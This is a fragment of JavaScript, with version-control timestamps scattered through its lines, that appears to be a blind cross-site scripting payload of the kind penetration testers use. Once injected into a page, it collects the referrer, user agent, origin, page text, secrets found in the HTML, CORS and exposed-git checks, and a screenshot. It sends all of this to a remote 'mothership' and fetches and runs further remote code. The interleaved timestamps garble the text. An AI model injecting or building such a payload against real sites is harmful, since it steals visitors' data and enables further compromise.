probe _return _data [ 'referrer' ] = never _null ( document . referrer ) ;
} catch ( e ) {
probe _return _data [ 'referrer' ] = '' ;
}
try {
probe _return _data [ 'user-agent' ] = never _null ( navigator . userAgent ) ;
} catch ( e ) {
probe _return _data [ 'user-agent' ] = '' ;
}
try {
probe _return _data [ 'browser-time' ] = never _null ( ( new Date ( ) . getTime ( ) ) ) ;
} catch ( e ) {
probe _return _data [ 'browser-time' ] = '' ;
}
try {
probe _return _data [ 'probe-uid' ] = never _null ( get _guid ( ) ) ;
} catch ( e ) {
probe _return _data [ 'probe-uid' ] = '' ;
}
try {
probe _return _data [ 'origin' ] = never _null ( location . origin ) ;
} catch ( e ) {
probe _return _data [ 'origin' ] = '' ;
}
try {
probe _return _data [ 'injection_key' ] = [ PROBE _ID ] ;
} catch ( e ) {
probe _return _data [ 'injection_key' ] = '' ;
}
2023-02-06 17:39:16 +00:00
try {
probe _return _data [ 'title' ] = document . title ;
} catch ( e ) {
probe _return _data [ 'title' ] = '' ;
}
try {
probe _return _data [ 'text' ] = get _dom _text ( ) ;
} catch ( e ) {
probe _return _data [ 'text' ] = '' ;
}
2021-05-31 19:06:40 +00:00
2023-02-06 17:39:16 +00:00
try {
probe _return _data [ 'was_iframe' ] = ! ( window . top === window )
} catch ( e ) {
probe _return _data [ 'was_iframe' ] = '' ;
2021-05-31 19:06:40 +00:00
2023-02-06 17:39:16 +00:00
}
2023-01-14 05:36:02 +00:00
2021-05-31 19:06:40 +00:00
2023-01-29 03:08:23 +00:00
async function hook _load _if _not _ready ( ) {
2021-05-31 19:06:40 +00:00
try {
try {
2023-01-14 05:51:05 +00:00
probe _return _data [ 'secrets' ] = look _for _secrets ( never _null ( document . documentElement . outerHTML ) ) ;
2021-05-31 19:06:40 +00:00
} catch ( e ) {
2023-01-14 05:51:05 +00:00
probe _return _data [ 'secrets' ] = [ ] ;
2021-05-31 19:06:40 +00:00
}
2023-01-26 17:53:54 +00:00
try {
2023-01-29 03:08:23 +00:00
const corsResults = await check _cors ( ) ;
probe _return _data [ 'CORS' ] = corsResults ;
2023-01-26 17:53:54 +00:00
} catch ( e ) {
2023-01-29 00:47:46 +00:00
probe _return _data [ 'CORS' ] = "false" ;
2023-01-26 17:53:54 +00:00
}
try {
2023-01-29 03:08:23 +00:00
const gitResults = await check _git ( ) ;
probe _return _data [ 'gitExposed' ] = gitResults ;
2023-01-26 17:53:54 +00:00
} catch ( e ) {
2023-01-29 00:47:46 +00:00
probe _return _data [ 'gitExposed' ] = "false" ;
2023-01-26 17:53:54 +00:00
}
2023-01-16 03:52:07 +00:00
probe _return _data [ 'secrets' ] = JSON . stringify ( probe _return _data [ 'secrets' ] ) ;
2021-05-31 19:06:40 +00:00
html2canvas ( document . body ) . then ( function ( canvas ) {
2023-01-14 01:26:10 +00:00
StackBlur . canvasRGB (
2023-01-14 01:47:27 +00:00
canvas , 0 , 0 , canvas . width , canvas . height , 20
2023-01-14 01:26:10 +00:00
) ;
2023-01-14 02:10:07 +00:00
var tempCanvas = document . createElement ( "canvas" ) ,
tCtx = tempCanvas . getContext ( "2d" ) ;
tempCanvas . width = 2560 ;
tempCanvas . height = 1440 ;
2023-01-14 02:33:17 +00:00
tCtx . drawImage ( canvas , 0 , 0 ) ;
2023-01-14 02:30:56 +00:00
probe _return _data [ 'screenshot' ] = tempCanvas . toDataURL ( ) ;
2021-05-31 19:06:40 +00:00
finishing _moves ( ) ;
} ) ;
} catch ( e ) {
probe _return _data [ 'screenshot' ] = '' ;
finishing _moves ( ) ;
}
}
function finishing _moves ( ) {
contact _mothership ( probe _return _data ) ;
collect _pages ( ) ;
if ( chainload _uri != "" && chainload _uri != null ) {
eval _remote _source ( chainload _uri ) ;
}
}
if ( document . readyState == "complete" ) {
hook _load _if _not _ready ( ) ;
} else {
addEvent ( window , "load" , function ( ) {
hook _load _if _not _ready ( ) ;
} ) ;
}